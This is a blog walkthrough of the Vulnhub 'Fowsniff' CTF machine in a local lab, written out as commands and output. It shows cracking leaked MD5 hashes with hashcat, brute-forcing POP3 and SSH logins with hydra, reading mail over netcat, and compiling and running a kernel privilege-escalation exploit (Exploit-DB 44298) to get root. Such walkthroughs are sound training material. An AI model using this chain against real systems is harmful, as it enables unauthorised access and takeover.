Finally had time to do another Vulnhub machine. Fowsniff looked fun and a friend of mine recommended it due to the Twitter component, so lets get started!
Enumeration
As always, lets start with an nmap:
[bash]
nmap -sC -sV -p- -oA initial 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 20:36 CET
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp – Delivering Solutions
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES PIPELINING AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 LOGIN-REFERRALS OK ENABLE AUTH=PLAINA0001 have listed post-login SASL-IR IDLE Pre-login capabilities more LITERAL+ ID
MAC Address: 08:00:27:92:B1:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[/bash]
So we have HTTP (80), SSH (22) and POP3 (110). Browsing the site indicates that Fowsniff sites has been compromised and points towards Twitter. Searching for Fowsniff on Twitter leads to the following tweets on https://twitter.com/fowsniffcorp
Seems like they have their passwords leaked. The even give a specific one:
Visiting the pastebin link referred to by the first link on https://pastebin.com/raw/NrAqVeeX leads to the output noted below. I’ve made some changes to the usernames and hashes to prevent Google-fu 🙂
[bash]
FOWSNIFF CORP PASSWORD LEAK
”~“
( o o )
+—–.oooO–(_)–Oooo.——+
| |
| FOWSNIFF |
| got |
| PWN3D!!! |
| |
| .oooO |
| ( ) Oooo. |
+———\ (—-( )——-+
\_) ) /
(_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
*auer@fowsniff:[8]a28a94a588a95b80163709ab4313aa4
*ustikka@fowsniff:[a]e1644dac5b77c0cf51e0d26ad6d7e56
*egel@fowsniff:[1]dc352435fecca338acfd4be10984009
*aksteen@fowsniff:[1]9f5af754c31f1e2651edde9250d69bb
*eina@fowsniff:[9]0dc16d47114aa13671c697fd506cf26
*tone@fowsniff:[a]92b8a29ef1183192e3d35187e0cfabd
*ursten@fowsniff:[0]e9588cb62f4b6f27e33d449e2ba0b3b
*arede@fowsniff:[4]d6e42f56e127803285a0a7649b5ab11
*ciana@fowsniff:[f]7fd98d380735e859f8b2ffbbede5a7e
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!
Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!
MD5 is insecure, so you shouldn’t have trouble cracking them but I was too lazy haha =P
l8r n00bz!
B1gN1nj4
————————————————————————————————-
This list is entirely fictional and is part of a Capture the Flag educational challenge.
All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.
Any similarities to actual people or entities is purely coincidental and occurred accidentally.
[/bash]
Okay, so their passwords were dumped in MD5 format. Lets get cracking!
Exploitation
I’ve used hashcat to crack these hashes. I’ve put all the hashes in a file named hashes and used rockyou.txt to have a crack at them. I’ve replaced the initial character with a * and passwords have a [] at the beginning because I don’t want everyone to stumble into the solution using Google.
[bash]
hashcat -m 0 passwords /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt –force
hashcat (v5.0.0) starting…
Dictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache building /usr/share/wordlists/SecLists/Passwords/Leaked-DatabasDictionary cache built:
* Filename..: /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344391
* Bytes…..: 139921497
* Keyspace..: 14344384
* Runtime…: 4 secs
*0dc16d47114aa13671c697fd506cf26:[s]coobydoo2
*d6e42f56e127803285a0a7649b5ab11:[o]rlando12
*dc352435fecca338acfd4be10984009:[a]pples01
*9f5af754c31f1e2651edde9250d69bb:[s]kyler22
*a28a94a588a95b80163709ab4313aa4:[m]ailcall
*7fd98d380735e859f8b2ffbbede5a7e:[0]7011972
*e9588cb62f4b6f27e33d449e2ba0b3b:[c]arp4ever
*e1644dac5b77c0cf51e0d26ad6d7e56:[b]ilbo101
[/bash]
I got 8 out of 9. Nice! I then used Hydra to see which username lines up with which password for the pop3 port, before moving to SSH. I’ve put all the usernames in the usernames file and passwords in a file named passwords.
[bash]
hydra -L usernames -P passwords -e nsr pop3://192.168.56.101
sudo hydra -L usernames -P passwords -e nsr pop3://192.168.56.101 -v
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-05 21:38:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first – and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 99 login tries (l:9/p:11), ~7 tries per task
[DATA] attacking pop3://192.168.56.101:110/
[VERBOSE] Resolving addresses … [VERBOSE] resolving done
[VERBOSE] CAPABILITY: +OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
USER
SASL PLAIN
.
[VERBOSE] using POP3 PLAIN AUTH mechanism
[110][pop3] host: 192.168.56.101 login: [s]eina password: [s]coobydoo2
[STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
[STATUS] 99.00 tries/min, 99 tries in 00:01h, 1 to do in 00:01h, 12 active
1 of 1 target successfully completed, 1 valid password found
[/bash]
Let’s login to the POP3 and see what goodies await:
[bash]
nc 192.168.56.101 110
+OK Welcome to the Fowsniff Corporate Mail Server!
USER [s]eina
+OK
PASS [s]coobydoo2
+OK Logged in.
LIST
+OK 2 messages:
1 1622
2 1280
Return-Path: <[s]tone@fowsniff>
X-Original-To: [s]eina@fowsniff
Delivered-To: [s]eina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: [b]aksteen@fowsniff, [m]auer@fowsniff, [m]ursten@fowsniff,
[m]ustikka@fowsniff, [p]arede@fowsniff, [s]ciana@fowsniff, [s]eina@fowsniff,
[t]egel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: [s]tone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "[S]1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we’ll set it up.
Thanks,
A.J Stone
[/bash]
Yes, we got the SSH password! Let’s fire up Hydra again to see who uses this password:
[bash]
hydra -L usernames -p [S]1ck3nBluff+secureshell -e nsr ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-08 20:05:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:9/p:4), ~3 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101 login: [b]aksteen password: [S]1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
[/bash]
Let’s login using SSH and the aforementioned user.
ssh 192.168.56.101 -l [b]aksteen
The authenticity of host ‘192.168.56.101 (192.168.56.101)’ can’t be established.
[b][email protected]’s password:
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| ‘_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| ‘__| ‘_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions
**** Welcome to the Fowsniff Corporate Server! ****
———- NOTICE: ———-
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
[/bash]
And we are on the machine!
Privilege escalation
Looking into the home folder of the user, there’s a text file called term.txt.
[bash]
[b]aksteen@fowsniff:~$ cat term.txt
I wonder if the person who coined the term "One Hit Wonder"
came up with another other phrases.
[/bash]
This must be a hint to get root access. I always start with the kernel itself, so lets check it out:
[bash]
uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[/bash]
Kernel 4.4.0-116 is quite old already. Let’s search the exploitDB to see if there’s anything good.
[bash]
searchsploit Linux 4.4.0-116
————————————————————————– —————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
————————————————————————– —————————————-
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) – Local Privilege Escalation | exploits/linux/local/44298.c
————————————————————————– —————————————-
[/bash]
Perfect, just what we need. I copied the exploit to my local folder and compiled it on my local machine with gcc to a file named pwnage. I’ve then send over the pwnage file to the machine using SCP. Executing it leads to:
[bash]
cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc -o pwnage 44298.c
./pwnage
task_struct = ffff88001a917000
uidptr = ffff88001af89b44
spawning root shell
root@fowsniff:/root# cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ‘ \/ _` | ‘_/ _` | _| || | / _` | _| / _ \ ‘ \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/
(_)
|————–
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|————–
|
|
|
|
|
|
—
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.
[/bash]